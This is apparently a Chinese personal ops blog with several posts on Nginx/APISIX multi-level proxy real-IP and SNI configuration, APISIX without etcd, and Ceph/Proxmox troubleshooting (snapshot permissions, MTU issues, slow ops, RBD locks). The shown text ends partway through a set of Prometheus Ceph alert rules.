Deng Yongjie's blog

Nginx和APISIX多级代理如何获取客户端真实IP地址—全网最详细

2024-09-28T14:20:49+08:00

问题一：SSL单向认证，一级代理和二级代理无法正常进行握手，因此访问时在一级代理会出现502状态码

单向认证

SSL单向认证只要求站点部署了ssl证书就行，任何用户都可以去访问(IP被限制除外等)，只是服务端提供了身份认证

debug error访问日志

[error] 611848#611848: *25 SSL_do_handshake() failed (SSL: error:0A000438:SSL routines::tlsv1 alert internal error:SSL alert number 80) while SSL handshaking to upstream, client: 192.168.10.46, server: jette-test.xxxx, request: “GET / HTTP/1.1”, upstream: “https://10.7.0.82:443/”, host: “jette-test.xxxx”

access 访问日志

状态码502

问题二：4层透明代理，无法透传XFF头，所以二级代理获取的IP地址是一级代理的IP，无法获取客户端真实IP

解决方案

通常使用的架构

在多级nginx 代理下进行https 配置。通常的架构是内部的nginx 之间采用的是http进行通讯
一级代理配置https，二级以上的nginx 则是配置http。架构图如下：

参考文档：https://github.com/apache/apisix/discussions/4793

如果需要采用问题一的链路架构方案，如何解决此问题？重点！

由于内网环境有直接访问worker节点及后端服务调用的情况，同时基于安全性考虑，会在ingress配置https证书。另外有项目需要获取真实IP的场景，通常情况前端一级代理会有haproxy或nginx负载均衡器，如果一级代理haproxy或nginx使用4层转发，则无法透传http头参数给ingress，所以ingress获取的是一级代理的IP地址。所以需要使用7层转发，从而衍生出一级代理HTTPS 转发至二级代理HTTPS的链路。

从上面问题一的error日志发现，一级代理nginx与二级代理进行SSL握手失败
从一级代理抓包分析，数据包显示一级代理发送client hello信息给二级代理成功，但二级代理并没返回server hello信息给一级代理，且报错：TLSv1.2 Record Layer: Alert (Level: Fatal, Description: Internal Error)
然后在二级代理apisix的日志发现报错：[error] 182#182: 3139952 [lua] init.lua:192: http_ssl_client_hello_phase(): failed to find SNI: please check if the client requests via IP or uses an outdated protocol. If you need to report an issue, provide a packet capture file of the TLS handshake., context: ssl_client_hello_by_lua, client: 10.7.0.223, server: 0.0.0.0:443
报错信息提示找不到sni？回复client端的hello信息失败，所以抓包上面显示：TLSv1.2 Record Layer: Alert (Level: Fatal, Description: Internal Error)
核对了一级代理和二级代理的TLS版本，均支持v1 v1.1 v1.2 v1.3，因此排除此问题导致的
回顾问题一的报错信息，结合SNI（Server Name Indication）资料和nginx的参数，发现nginx是默认关闭了此功能。所以原因是上游二级代理无法接收到正确的server_name，导致二级代理证书返回的不对，二级代理apisix就会返回400状态码拒绝请求，也就出现了抓包的提示Level: Fatal, Description: Internal Error以及二级代理的报错找不到对应的SNI：failed to find SNI:please check if the client requests via IP or uses an outdated protocol. If you need to report an issue, provide a packet capture file of the TLS handshake。SNI的作用就是指定服务器的主机名，也就是携带域名server_name请求指定的IP

配置文件参数：https://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_ssl_server_name

一级代理nginx配置文件

        #添加下面两行参数    proxy_ssl_server_name on;    proxy_ssl_name $host;

参数详解

set_real_ip_from（二级代理需要信任一级代理的地址）

请求来源 IP 在 set_real_ip_from 范围内
如果请求来源的 IP 地址在 set_real_ip_from 指定的范围内，Nginx 会信任该请求，并使用 real_ip_header 指定的头部（如 X-Forwarded-For）中的值作为客户端的真实 IP 地址。

请求来源 IP 不在 set_real_ip_from 范围内

如果请求来源的 IP 地址不在 set_real_ip_from 指定的范围内，Nginx 不会信任这个请求中的 X-Forwarded-For 头部中的 IP 地址。

行为:

Nginx 直接使用请求来源的 IP 地址（即 $remote_addr）作为客户端的 IP 地址
这意味着 Nginx 会将负载均衡器或代理服务器的 IP 地址视为客户端的 IP，而不会考虑 X-Forwarded-For 头中的值。

场景：

在set_real_ip_from范围内：如果你有一级代理nginx负载均衡器，所有请求都会先经过它再到达二级代理Nginx。nginx负载均衡器会在请求头中加入 X-Forwarded-For 以记录客户端的真实 IP。如果你将nginx负载均衡器的 IP 地址配置在 set_real_ip_from 中，二级代理Nginx 会读取并信任 X-Forwarded-For 中的客户端真实 IP。
不在set_real_ip_from范围内： 如果请求不是通过你信任的一级代理nginx负载均衡器发来的（可能是直接访问二级代理 Nginx，或者来自不可信的代理服务器），二级代理Nginx 会认为这个请求中的 X-Forwarded-For 不可信，于是使用实际请求来源 IP（一级代理nginx负载均衡器或代理的 IP 地址）作为客户端 IP。

X-Real-IP

是一个自定义头。X-Real-Ip 通常被 HTTP 代理用来表示与它产生 TCP 连接的设备 IP，这个设备可能是其他代理，也可能是真正的请求端。需要注意的是，X-Real-Ip 目前并不属于任何标准，代理和 Web 应用之间可以约定用任何自定义头来传递这个信息。

X-Forwarded-For
X-Forwarded-For 是一个扩展头。HTTP/1.1（RFC 2616）协议并没有对它的定义，它最开始是由 Squid 这个缓存代理软件引入，用来表示 HTTP 请求端真实 IP，现在已经成为事实上的标准，被各大 HTTP 代理、负载均衡等转发服务广泛使用

X-Forwarded-For: IP0, IP1, IP2

Proxy3 直连服务器，它会给 XFF 追加 IP2，表示它是在帮 Proxy2 转发请求。列表中并没有 IP3，IP3 可以在服务端通过 remote_address 来自 TCP 连接，表示与服务端建立 TCP 连接的设备 IP，在这个例子里就是 IP3。

详细分析一下，这样的结果是经过这样的流程而形成的：

用户IP0—> 代理Proxy1（IP1），Proxy1记录用户IP0，并将请求转发个Proxy2时，带上一个Http Header X-Forwarded-For: IP0
Proxy2收到请求后读取到请求有 X-Forwarded-For: IP0，然后proxy2 继续把链接上来的proxy1 ip追加到 X-Forwarded-For 上面，构造出X-Forwarded-For: IP0, IP1，继续转发请求给Proxy 3
同理，Proxy3 按照第二部构造出 X-Forwarded-For: IP0, IP1, IP2,转发给真正的服务器，比如NGINX，nginx收到了http请求，里面就是 X-Forwarded-For: IP0, IP1, IP2 这样的结果。所以Proxy 3 的IP3，不会出现在这里。
nginx 获取proxy3的IP 能通过remote_address就是真正建立TCP链接的IP，这个不能伪造，是直接产生链接的IP。$remote_address 无法伪造，因为建立 TCP 连接需要三次握手，如果伪造了源 IP，无法建立 TCP 连接，更不会有后面的 HTTP 请求。

二级代理apisix修改配置

vim templates/configmap.yaml        real_ip_header: "X-Real-IP"        #real_ip_header: "X-Forwarded-For"    # http://nginx.org/en/docs/http/ngx_http_realip_module.html#real_ip_header        real_ip_recursive: "on"        real_ip_from:                  # http://nginx.org/en/docs/http/ngx_http_realip_module.html#set_real_ip_from        #注意这里的IP地址需要填写上级代理的地址，比如上级的代理是haproxy或nginx          - 10.7.0.7          - 10.7.0.0/22          - 127.0.0.1          - 'unix:'

验证结果

一级代理日志：携带了server_name访问二级代理的443，并且有返回结果，访问正常

深入抓包验证

客户端有携带server_name，并且server端可以正常返回

最后二级代理日志有流量进入且正常转发至后端gateway服务，并且返回数据包，能够获取客户端真实IP地址，因为一级代理与二级代理成功携带server_name握手通信，证书链返回正确

192.168.10.46 192.168.10.46, 192.168.10.46 - [12/Sep/2024:16:32:11 +0800] jette-test.xxx “GET / HTTP/1.0” 404 88 0.003 “” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36” 10.42.44.159:8750 404 0.003 “http://jette-test.xxx”

Apache APISIX-Ingress无需ETCD结论方案

2024-08-25T19:38:01+08:00

无ETCD官方博客参考

https://apisix.apache.org/zh/blog/2023/10/18/ingress-apisix/

部署测试

#注意，这里只能使用1.7.0版本。经过测试，1.8.2最新版会启动失败，日志报错：无法使用单机模式，提示etcd端点检查失败，需要连接etcd。git clone --depth 1 --branch 1.7.0 https://github.com/apache/apisix-ingress-controller.git ingress-apisix-1.7.0cd ingress-apisix-1.7.0kubectl apply -k samples/deploy/crd/v1/#经过测试，修改yaml文件的kind为daemonset和hostnetwork是可行的。但修改http和https端口时，日志会出现报错：连接etcd端点拒绝。由于POD内有2个容器，一个是controller，另一个是apisix，尝试多次不同的端口组合，并不能成功修改默认的端口为80 443。kubectl apply -f samples/deploy/composite.yaml

部署应用进行测试连通性

1.自行创建一个nginx服务，过程忽略

2.创建apisix的路由，只能通过yaml文件创建。注意，这不是ingress，是路由规则

apiVersion: apisix.apache.org/v2kind: ApisixRoutemetadata:  name: http-route  namespace: jette-testspec:  http:    - name: route-1      match:        hosts:          - httpbin.org        paths:          - /*      backends:        - serviceName: nginx-test          servicePort: 80kubectl apply -f test-route.yaml

3.查看路由规则

kubectl get ApisixRoute -A

4. 访问测试

curl http://127.0.0.1:9080 -H 'Host: httpbin.org'

绑定host，浏览器访问

结论

无etcd模式，仅适用纯粹的APISIX网关。目前暂不适合替换K8S集群nginx-ingress，因为需要手动通过yaml文件创建APISIX提供指定apiversion来配置路由规则，这并不是ingress，而且无etcd模式不能部署Dashboard可视化管理，因此管理和使用都会比较麻烦。

APISIX有三种部署模式：

第一种是有etcd的替换nginx-ingress，可以在K8S集群创建ingress后，apisix-controller成功监听并自动配置路由规则。
第二种是有etcd纯粹的POD服务，可以用为K8S集群内部apisix-gateway服务，POD之间的转发路由等，由于流量先进入nginx-ingress，再到apisix-gateway，所以此方法会多了一层转发，链路变长，访问延迟提升。
第三种是VM部署，需要自行配置高可用VIP飘移。

部署模式优缺点对比

无etcd模式，纯粹的APISIX网关——不适用我们的场景

优点：
1. 轻量级高性能
2. 以声明式配置作为配置的唯一来源，减少运维复杂性
缺点：
1. 没有可视化，没有ingress，只有配置路由规则，对于开发人员不友好，使用和配置域名不方便
2. 不能自定义修改默认端口
3. 目前测试版本为1.7.0，原地升级版本有兼容问题启动报错

有etcd模式，替换nginx-ingress

优点：
1. 基于K8S创建ingress或者Rancher创建ingress，apisix-controller自动监听ingress-class，自动配置路由规则，无需人工介入
2. 有Dashboard可视化路由规则
3. 高性能
4. 多种插件集成，支持多种自定义配置
缺点：
1. 重量级，维护成本高，强依赖etcd集群
2. Dashboard不能修改自动监听到的ingress的路由规则，否则二次修改ingress配置，可能会无法监听并更新路由
3. K8S集群1.20以下，K8S创建ingress时，需要手动修改apiversion为networking/v1beta1，否则Rancher创建ingress的默认apiversion，APISIX无法监听并自动配置路由。因此建议使用K8S集群高于1.22以上版本，例如1.23、1.24 等较新的 LTS 版本
4. 需要使用helm部署，由于官方版本发布较快，高版本修改的参数较多，并且有部分配置参数改名或废弃导致不兼容，因此后期更新版本的不确定因素变多，影响较大

有etcd模式，纯粹的POD服务

优点：
1. 高性能
2. 多种插件集成，支持多种自定义配置
3. Dashboard可视化配置路由规则
4. 可随时修改路由配置热更新
缺点：
1. 重量级，维护成本高，强依赖etcd集群
2. 需要使用helm部署，由于官方版本发布较快，高版本修改的参数较多，并且有部分配置参数改名或废弃导致不兼容，因此后期更新版本的不确定因素变多，影响较大
3. 链路变长，延迟提高。流量先进入ingress，再到apisix-gateway

VM部署高可用模式

优点：
1. 高性能，在备用节点进行版本升级，影响较小，高可靠
2. 多种插件集成，支持多种自定义配置
3. Dashboard可视化配置路由规则
4. 可随时修改路由配置热更新
缺点：
1. 重量级，维护成本高，强依赖etcd集群
2. 如果选择传统链路，流量先进入VM-apisx，再进入ingress，此链路也会变长，延迟提高。

链路架构优缺点对比

有etcd模式，替换nginx-ingress

链路短，高性能，能获取真实HTTP头

有etcd模式，纯粹的POD服务

链路长，可能引发协议不匹配错误，HTTP头处理错误从而拒绝服务

VM部署高可用模式

链路短，高性能，能获取真实HTTP头。如果使用传统nginx-ingress，此模式的意义不大，链路反而更长。

但是后端POD暴露的NodePort端口会很多，后续的端口配置管理不友好，要对K8S熟悉度要求比较高

Ceph的版本选择-必看！

2024-08-04T15:02:03+08:00

前言

开源软件质量参差不齐，千万别选错了版本，娶错了娇娘。

首先需要强调的一点就是，任何的开源软件很难做到开箱即用，比较各个开源软件，无非是坑多坑少，坑深坑浅的区别。你能力强，别人眼里的大坑，在你这里就是”洒洒水“，能力弱些的，随便几个小坑几分钟就"扶墙而归"。所以选开源软件一个最重要的原则就是”量体裁衣"，选个自己能力范围内hold住的，会让你轻松不少。

首先搞清楚要的是文件cephfs、对象rgw、还是块rbd，需要用到哪些功能，把这些要用到的功能点都罗列到一个表格，根据应用场景如kvm虚拟机、k8s容器，网盘等，筛选哪些功能点是刚需必选，哪些是可选。根据罗列的功能点列表，找到哪个大版本是满足你当前需求的(基本上就可以定下Ceph大版本序号)，最终根据测试结果再划定真正安全可控的安全区域。

x.0.z - 开发版（给早期测试者和勇士们）

x.1.z - 候选版（用于测试集群、高手们）

x.2.z - 稳定版（给用户们）

通过前面的方法基本已经选定了当前大版本，那么要搞清楚当前选择的大版本处于一个什么样的小版本阶段。以12.2的L版本为例，12.2.0~12.2.5基本上属于前期小白鼠阶段，坑多稳定性稍差，前面说的能力强以及数据丢了不用删库跑路的大哥可以关注下，这趟车一般都是会充满各种新奇冒险故事，可能在哪个不经意的角落你就能发现某个前面还一起飙车的车友已经翻了车(当然这里只是个段子）。12.2.5是个分水岭，基本上这个小版本开始就进入了逐步稳定的阶段，富于冒险和自信动手能力不错的可以上车了，遇上大坑小坑都可以自己修或者反馈给社区，毕竟都是抱着开源这条大腿一起成长。12.2.12版本或者是12.2.13版本以后，基本上12这个大版本的开发维护就已经到了尽头，这个时候的12版本基本已经完成了，不喜欢升级来回折腾的，可以上车了。

很多时候遇上bug或者问题，通过升级Ceph的版本都可以解决，但是任何软件升级都会带来很多未知风险。而且像升(sheng)级割(ge)接一类的工作一般都是选择在夜深人静的时候，所以版本没选好，经常性的夜夜升割，你的小身板挺得住吗？同时数据存储一类的系统不同于网络或者k8s一类的计算调度系统，他们升级不成功大不了回滚和重启，存储要是没升级上去，你就只能……

无论新手还是老司机，每次看到更新了新的版本号，都想跃跃欲试。但是作为老司机，必须提醒无论新版本多么诱惑，升级前一定要模拟线上场景做好和做足故障演练的前戏，不然很可能像武大郎一样蹦跶一晚上还上不金莲妹子的床。如果选错了版本，最终可能会被你选中的"金莲"喊你起床喝药……

PVE添加Ceph存储因权限不足导致无法移除磁盘-快照被保护的问题

2024-07-16T22:26:23+08:00

背景：

由于云控制台上面，客户需要对云主机保存当前镜像的功能，所以有了创建镜像功能，创建镜像之后一直处于创建中状态。

于是开始了深入排查，云控制台点击创建之后，后端的流程：先有1台模板机，然后链接克隆模板成为1台VM，并且新增1块磁盘。然后再完整克隆这台带有数据盘的VM，把二次克隆的VM转为新的模板，新的模板数据盘分离后，删除数据盘，提示无法删除，提示需要解除保护快照，导致VM出现未使用的磁盘长期置留在控制台，在云控制台显示一直处于创建中，无法完成创建，属于PRD故障。

解决方法：

下面是RBD的介绍：

https://docs.ceph.com/en/latest/rbd/rbd-snapshot/

临时人工解除快照保护处理，手动移除
把整个流程重新复现跑一遍，同时观察PVE控制台任务详情，然后找到关键报错信息，授权Ceph普通用户组件权限，解决此故障。

解决过程：

临时手动解决方法：

列出image的快照
rbd snap ls hz_c1_xds_kvm_data/base-526475968-disk-1
查找过滤出快照
rbd ls -l -p hz_c1_xds_kvm_data |grep “base-526475968-disk-1”
解除快照保护
rbd snap unprotect hz_c1_xds_kvm_data/base-526475968-disk-1@base
清理所有快照可以使用purge子命令rbd snap purge hz_c1_xds_kvm_data/base-526475968-disk-1

罗列某个快照的子孙：

rbd children {pool-name}/{image-name}@{snapshot-name}

彻底解决方法：

代码调用PVE时，到了转成模板，分离数据盘，移除数据盘这步骤，就出现了报错，下图是PVE控制台查看的任务详情，可以看出是不允许操作，感觉是权限问题

然后去查看用户权限，核对Ceph的用户权限，怀疑是不是各组件缺少权限，所以解除快照保护这步骤失败，因为PVE是调用ceph的rados接口，同样的rbd操作。然后重新授权权限为所有组件

ceph auth caps client.hz_c1_xds_kvm_user mon ‘allow *’ osd ‘allow *’ mgr ‘allow *’ mds ‘allow *’

最后重新去云平台触发保存当前镜像的操作，同时在PVE控制台观察任务详情，显示成功了，验证了是权限问题导致。新的模板数据盘分离后，数据盘消失，代表移除成功。

总结：

在Ceph-RBD存储来说，镜像快照就是PVE上层的链接克隆，对于底层存储来说，就是一堆快照儿子，一旦父镜像被删除，这些快照儿子就没了

有些看起来的报错是A的问题，实际上可能是B引起的，或者是B的流程、逻辑有问题，然后B的问题本质是C配置有误，导致这种级联故障。所以还需融合贯通整个链路，深入排查分析，处处找线索、蛛丝马迹，然后顺藤摸瓜，此排查过程又会引入其它问题，也会被其它问题所干扰，所以必须要看透问题的本质，才能串联起A B C三者之间的所有细节，综合分析出到底是哪个环节出问题！切勿停留在表面，表面就是烟雾弹，不能被 “形” 所困惑了，一定要从 “神” 的层面去思考，不能知其然而不知其所以然！

Proxmox VE客户端跨网段挂载Ceph-RBD存储出现got timeout超时问题（畸形报文-数据包不完整）

2024-07-07T20:16:28+08:00

描述：

Proxmox VE的IP段：172.22.1.0/25
Ceph集群的IP段： 172.22.2.0/28

背景：

PVE的主机挂载使用Ceph-RBD存储

问题：

在PVE管理控制台数据中心添加了RBD之后，存储池的状态为unknown，并且提示了超时，无法使用RBD，具体问题如下图：
由于截图涉及机密信息，这里需脱敏处理，只展示部分截图

排查过程：

1. 起初判断是没有放行端口造成的，随后放行了下面端口和协议

源IP地址：172.22.1.148 xxxxxxx

目标IP地址：172.22.2.4 xxxxxxx

TCP端口：3300,2049,6789-7300

UDP端口: 2049

2. 放行了端口和协议，还是添加不上RBD，删掉重加也是一直转圈圈。尝试不做任何限制，全放通还是老样子

3. PVE是7.4版本，不确定是否版本原因。查看了Ceph内核日志、PVE日志，都没发现有其它的报错。尝试降低版本为7.2

4. 降低版本还是一样。。然后去pve执行命令会hang住，telnet端口却是通的，只要添加了RBD存储，日志就会提示：状态更新超时，如下图：

5. 然后查看ceph的配置是否有网段限制，配置也是全网段放通的，发现并没有网络限制。

6. 最后找不到问题，抓包分析数据包情况。分析结果为：畸形报文，标志位为RST重置了链接

7. 疑问：为什么会有畸形报文？什么情况会重置连接？

畸形报文是在网络通信中传输的数据包格式不正确或不符合协议规范，导致接收方无法正确解析和处理该数据包。

数据包大小超出了协议规定的最大值或最小值。
数据包格式不正确，例如缺少必要的字段或标志位。
数据包中存在不合法的字符或编码。
数据包被篡改、破坏或损坏，例如由于网络故障、嗅探攻击或恶意软件等原因。
数据包在传输过程中被分片、重组或重复发送，导致数据包序列号、标识符等字段出现错误。
接收方与发送方之间使用了不兼容的协议版本或实现方式。
网络设备（例如路由器、交换机等）对数据包进行了错误处理，例如截断、丢弃或修改数据包内容等。

TCP连接被重置并关闭的原因：

连接超时：如果一段时间内没有数据传输，则可能会超时并关闭连接。
网络故障：如果网络出现故障，例如丢包或延迟过高，可能会导致连接重置并关闭。
程序错误：如果应用程序出现错误或异常，可能会导致连接被重置并关闭。
安全策略：某些安全策略可能会强制终止连接，例如防火墙规则或入侵检测系统。
当TCP连接被重置并关闭时，通常意味着发生了某种异常情况，例如网络故障或应用程序错误。在Wireshark中看到RST标志位通常意味着TCP连接已被重置并且已经关闭。

有了畸形报文，所以就会不等回应，直接重置连接并关闭

8. 然后路由追踪多少个跳点，判断经过多少个交换机

9. 中间跳了4次，经过沟通得知中间经历了路由器和交换机。那么问题出现在哪？经过上面的畸形报文分析，有可能是数据包大小不一致

10.为了增强吞吐量，底层存储和PVE都是用的MTU为9000，然而这里的PVE中间经历了NSX转发、路由器和交换机，中间的交换机或路由器没有统一设置MTU为9000，所以导致了报文畸形

11. PVE把MTU改成1500，然后恢复正常

结论：

畸形报文会导致接收方无法正确解析和处理数据包，从而可能会引起安全问题或网络故障。为了避免这些问题进一步扩大，接收方通常会立即重置连接并关闭，以避免继续接收来自发送方的畸形报文。这种处理方式可以有效地保护网络免受攻击和故障，并确保网络通信的可靠性和安全性。

解决方案：

尽量缩短数据转发链路，底层存储或基础设施，每个网段之间只通过交换机来做数据包的转发，把所有交换机设备MTU统一改成9000，这样下游的服务器不管是1500还是9000都不会产生数据包畸形的问题

Ceph节点故障触发重平衡，导致IO堆积，大量SLOW OPS卡死OSD，引起虚拟机无法写入

2024-06-16T19:08:40+08:00

Ceph节点故障触发重平衡，导致IO堆积，大量SLOW OPS卡死OSD，引起虚拟机无法写入解决方法

由于1台节点主板电压不稳，突然暴毙。大概有40T数据，此节点宕机后，触发Ceph的重平衡机制，此时磁盘占用大量IO，然后影响到虚拟机的读写性能和可用性，最后导致Ceph堆积了大量IO在排队处理，造成虚拟机可能出现这些情况：IO路径闪断、操作系统瞬间无法写入、无法开机、IO资源争抢。

主要原因是：

crushmap规则里面的故障域没有改成host，导致3副本都在同一台节点
故障节点硬盘可以不用格式化，禁止集群重平衡，重新把故障节点加入集群尝试激活旧的硬盘
把故障节点的硬盘格式化了，重新加入集群，导致丢失部分PG，而集群认为PG的ID是存在的，实际上，这些数据块并不在磁盘了，所以一直堆积着

首先查看IO是否被阻塞，如果被阻塞了，证明前面有任务IO在排队，导致后面的也无法写入，没有流量进来。下图就是IO被堆积阻塞了，由于把旧的盘格式化，节点还是旧的系统，重新加入集群，主机名和IP都是一样的，导致去操作部分PG时，实际上数据块没有在磁盘了，一直hang住，堆积阻塞着，后面的任务IO无法处理。Ceph是处理完第一个IO完整的请求之后，才会处理第二个的

告警里面一堆的slow ops，就是那些空的数据块在卡着

PG_AVAILABILITY: Reduced data availability: 29 pgs

查看mon日志、mds日志、osd日志tail -f -n 200 /var/log/ceph/首先查看告警上面的PG是否存在，如果不存在了，那只能重建PGceph pg 6.14 queryError ENOENT: i don't have pgid 6.14不存在这个PG了，只能重建，否则会一直卡着这些IO逐个PG都要重建ceph osd force-create-pg 19.15a  --yes-i-really-mean-it

上面重建完PG之后，如果还有部分OSD处于slow ops，需要手动重启这几个OSD

先看日志有没有slow ops的提示，然后逐个OSD重启tail -f -n 200 /var/log/ceph/ceph-osd.50.logsystemctl restart ceph-osd@50

然后集群就能恢复正常读写，处理IO了。但是还会出现unknown的PG，只能修复，修复不了只能回滚或删掉

先看下unknown的pg是否实际存在？如果还有1个osd存在该pg副本的，则尝试修复，修复PG的在下面PG数据损坏有流程，比较麻烦。修复不了只能删掉

删除unknown的pg的命令ceph pg 27.13 mark_unfound_lost delete

get_health_metrics reporting 3 slow ops的解决办法！

查看集群状态发现慢请求的osd告警：

OSD_SLOW_PING_TIME_BACK: Slow OSD heartbeats on back (longest 3160.225ms) OSD_SLOW_PING_TIME_FRONT: Slow OSD heartbeats on front (longest 3011.094ms)

SLOW_OPS: 4 slow ops, oldest one blocked for 970 sec, osd.11 has slow ops

osd日志发现：

osd.11 31902 get_health_metrics reporting 4 slow ops, oldest is osd_op(client.145746656.0:142372 17.ee 17:77588fb0:::rbd_data.3c1db779e4202a.0000000000000105:6 [sparse-read 0~1048576] snapc 0=[] ondisk+read+known_if_redirected e31902) log_channel(cluster) log [WRN] : 4 slow requests (by type [ ‘reached pg’ : 1 ‘delayed’ : 3 ] most affected pool [ ‘hz-c1-basic-wrk-pve-cache’ : 4 ])

问题原因：因为osd是机械硬盘，导致nvme缓存层的大量IO卡住，卡住原因是由于nvme缓存盘线程较多，直接把整个节点的内存吃完，导致触发内核OOM。多个子操作执行速度慢，又导致IO等待时间增加，最后op_commit将操作结果写入osd机械硬盘存储，机械盘延迟较高，所以客户端新进去的流量，又触发NVME类型的osd缓存盘请求阻塞限流，引发多个osd震荡，最终节点CPU、内存突增OOM，以此恶性循环。

还有osd有逻辑坏道也会导致slow ops，延迟会非常高，虽然说不会有致命威胁，但会严重拉低性能。以下是逻辑坏道的警告信息：

[WRN] OSD_TOO_MANY_REPAIRS: Too many repaired reads on 1 OSDs** osd.32 had 13 reads repaired**

下图是op的全流程和时间：

通常整个流程是0.05秒，即是50毫秒以内才算正常。这里用了4秒多，有些甚至70秒，延迟非常严重

#查看op的完整流程ceph daemon osd.11 dump_historic_ops_by_duration#过滤一下时间ceph daemon osd.11 dump_historic_ops_by_duration|grep duration#查看osd的日志，找一下pg的号数对应的osdceph pg 6.e1 query|grep primary#查看osd对应的磁盘ioiostat -xm 1

官方新版弃用了缓存层，不稳定有缺陷：

https://ceph.com/en/news/blog/2023/v18-2-0-reef-released/

https://github.com/feryw/linux-4.14.y/commit/3f376cc03766f2c1f98f63066700e7d1a3d94f0d

解决办法：

#把ping_time调整3000ms或5000msceph tell osd.* injectargs '--mon_warn_on_slow_ping_time 3000'#升级物理服务器内存256G#调整osd的system参数OOMScoreAdjust=-1000Restart=alwayssystemctl daemon-reload#上面的步骤实在不行，如果还是暴增内存。那么只能把缓存层给刷盘，删除了ceph osd tier cache-mode hz-c1-basic-wrk-pve-cache readproxy --yes-i-really-mean-itrados -p hz-c1-basic-wrk-pve-cache cache-flush-evict-ail#删除 overlay，这样客户端不会再访问缓存层ceph osd tier remove-overlay hz-c1-basic-wrk-pve#最后删除 缓存池ceph osd tier remove hz-c1-basic-wrk-pve hz-c1-basic-wrk-pve-cache

Ceph-RBD锁引起KVM无法开机问题(RBD块设备无法映射)

2024-06-02T17:43:41+08:00

前言

不知什么原因，KVM内核日志提示IO error，大部分命令执行无响应，关机之后无法启动

内核日志报错：

关机后无法启动报错：

排查过程

根据启动时的报错，进入PVE查看内核日志，发现RBD映射解锁失败？

于是找了相关资料，初步判断是否ceph镜像的锁没有释放？

查看镜像锁和相关的rbd特性

rbd lock ls xds_kvm_dev_data/vm-516-disk-cloudinitrbd info xds_kvm_dev_data/vm-516-disk-0

发现rbd并没有锁

然后找了此4个特性的资料

ceph rbd的新特性

ceph支持 layering,striping exclusive lock, object map,fast diff ,deep-flatten 等新的new features

layering
image的克隆操作。可以对image创建快照并保护，然后从快照克隆出新的image出来，父子image之间采用COW技术，共享对象数据。
striping v2
条带化对象数据，类似raid 0，可改善顺序读写场景较多情况下的性能。
exclusive lock
保护image数据一致性，对image做修改时，需要持有此锁。这个可以看做是一个分布式锁，在开启的时候，确保只有一个客户端在访问image，否则锁的竞争会导致io急剧下降。主要应用场景是qemu live-migration。
object map
此特性依赖于exclusive lock。因为image的对象分配是thin-provisioning，此特性开启的时候，会记录image所有对象的一个位图，用以标记对象是否真的存在，在一些场景下可以加速io。
fast diff
此特性依赖于object map和exlcusive lock。快速比较image的snapshot之间的差异。
deep-flatten
layering特性使得克隆image的时候，父子image之间采用COW，他们之间的对象文件存在依赖关系，flatten操作的目的是解除父子image的依赖关系，但是子image的快照并没有解除依赖，deep-flatten特性使得快照的依赖也解除。
journaling
依赖于exclusive lock。将image的所有修改操作进行日志化，并且复制到另外一个集群（mirror)，可以做到块存储的异地灾备。这个特性在部署的时候需要新部署一个daemon进程，目前还在试验阶段，不过这个特性很重要，可以做跨集群/机房容灾。

创建image的时候，jewel默认开启的特性包括: layering/exlcusive lock/object map/fast diff/deep flatten

Exclusive Lock
从上面可以看出，很多特性都依赖于exclusive lock，重点介绍一下。

exclusive lock 是分布式锁，实现的时候默认是客户端在第一次写的时候获取锁，并且在收到其他客户端的锁请求时自动释放锁。这个特性在jewel默认开启后，本身没什么问题，客户端可以自动获取和释放锁，在客户端crash后也能够正确处理。

通过上面RBD特性资料可以知道，很有可能是因为PVE内核不支持这几种特性，导致锁没有及时释放或者没有加超时时间？导致rbd镜像实际上不存在锁了，而PVE内核层面却还在不停解锁？解锁失败就无法映射RBD，从而导致KVM的开机失败？

再次重试开机多次失败，并查看是否还有镜像锁，然后尝试禁用此4种特性，看最终是否能开机？

rbd lock ls xds_kvm_dev_data/vm-516-disk-0#禁用特性，KVM相关的所有盘都要操作rbd feature disable xds_kvm_dev_data/vm-516-disk-0 exclusive-lock object-map fast-diff deep-flattenrbd info xds_kvm_dev_data/vm-516-disk-0

查看了锁并不存在，查看了镜像特性，已经全部关闭了。那么可以判定的是ceph-rbd镜像没有损坏，要么就是新特性的锁导致的问题，要么就是PVE内核映射rbd时出现了问题？

禁用了4种特性，然后再次尝试多次开机，发现还是无法开机，但换了另一种报错，提示需开启这3种特性？ fast-diff,object-map,exclusive-lock

那么可以判断出，PVE是支持这3种特性的，不支持deep-flatten特性？也就是说没有把快照的依赖也解除？

尝试开启3种特性，开启失败只能让PVE自身去启动。

rbd feature enable xds_kvm_dev_data/vm-516-disk-1 layering exclusive-lock object-map fast-diff

再次启动发现成功了，然后查看镜像锁是否也加了上去就能判断问题是PVE内核问题还是Ceph-RBD问题。

最终发现ceph-rbd加锁了，问题显然是出现在PVE的内核，此次问题是实际上ceph的镜像锁已经没了，PVE内核执行开机会映射rbd，然后提示解锁失败，所以无法开机。

这是PVE内核的缺陷还是BUG，也就没有深究下去，审计源码是漫长耗时耗力的过程。

最后查看集群默认开启的特性，61的含义如下：

61的意思是上面图中的bit码相加得到的值

解决方案

如再次复现此情况，需要重新禁用4种特性，并且尝试多次开机。如果报错提示需开启3种特性，那么需要开启此特性，再次开机

另外需要将配置文件分发到各个节点，在ceph.conf中增加rbd_default_features，写明你创建的卷需要哪几种属性。

[global]rbd_default_features = "layering, exclusive-lock, object-map, fast-diff"

Prometheus监控-Ceph告警规则到飞书群组（全网最全最详细）

2024-05-26T19:06:18+08:00

Prometheus监控-Ceph告警规则（全网最全最详细）

groups:- name: ceph.rules  rules:  - alert: Ceph Target Down    expr: up{job="C2-Ceph"} == 0    for: 5m    #for: 1m    labels:      severity: critical      cluster_name: C2-Ceph-Cluster    annotations:      description: CEPH target down for more than 2m, please check - it could be a either exporter crash or a whole cluster crash      summary: CEPH exporter down  - alert: Ceph Error State    expr: ceph_health_status >= 1    for: 5m    labels:      cluster_name: C2-Ceph-Cluster      severity: critical    annotations:      description: Ceph is in Error state longer than 5m, please check status of pools and OSDs      summary: CEPH in ERROR  - alert: Ceph Warn State    expr: ceph_health_status == 1    for: 10m    labels:      cluster_name: C2-Ceph-Cluster      severity: warning    annotations:      description: Ceph is in Warn state longer than 30m, please check status of pools and OSDs      summary: CEPH in WARN  - alert: Osd Down    expr: ceph_osd_up == 0    for: 5m    labels:      cluster_name: C2-Ceph-Cluster      severity: warning    annotations:      description: OSD is down longer than 30 min, please check whats the status      summary: OSD down  - alert: Ceph Pg Unavailable    